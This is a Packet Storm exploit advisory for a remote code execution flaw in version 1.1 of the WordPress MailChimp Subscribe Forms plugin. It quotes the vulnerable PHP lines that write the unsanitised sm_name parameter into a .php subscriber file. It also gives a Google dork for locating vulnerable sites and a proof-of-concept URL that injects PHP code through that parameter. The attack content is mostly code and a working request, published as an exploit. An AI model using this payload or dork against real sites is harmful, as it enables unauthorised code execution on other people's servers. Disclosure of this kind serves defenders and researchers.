Exploit the possiblities

WordPress MailChimp Subscribe Forms 1.1 Remote Code Execution

WordPress MailChimp Subscribe Forms 1.1 Remote Code Execution
Posted Mar 23, 2016
Authored by CrashBandicot

WordPress MailChimp Subscribe Forms plugin version 1.1 suffers from a code execution vulnerability.

tags | exploit, code execution
MD5 | f0699e5cd4d047d454faf0fbdd8f86a1

WordPress MailChimp Subscribe Forms 1.1 Remote Code Execution

Change Mirror Download
# Exploit Title: Wordpress Plugin MailChimp Subscribe Forms - Remote Code Execution
# Date: 23-03-2016
# Exploit Author: CrashBandicot
# Google Dork : inurl:/wp-content/plugins/mailchimp-subscribe-sm/
# Vendor Homepage: https://fr.wordpress.org/plugins/mailchimp-subscribe-sm/
# Tested on: MSWin32
# Version: 1.1

# Vulnerability in GET
# Put your mail for subscribe and send but add in URL the Parameter sm_name with PHP Code

# Vulnerable Files : mailchimp-subscribe-sm/inc/store-address.php

18. if(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*$/i", $_GET['sm_email'])) {
...
23. $smf_data = '* Name : '.$_GET['sm_name'];
24. $smf_data .= ' Email : '.$_GET['sm_email'].' , '. PHP_EOL;
...
36. $file = "sm_subscribers_list.php";
...
39. $fp = fopen($file, "a");
40. fwrite($fp, $smf_data);
...
42. fclose($fp);

# PoC : localhost/subscribe/?sm_email=0day@0day.com&sm_name=<?php phpinfo(); ?>&submit=subscribe

# Result in file sm_subscribers_list.php

# PicS : http://i.imgur.com/HHtuycC.png

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    2 Files
  • 19
    Feb 19th
    7 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close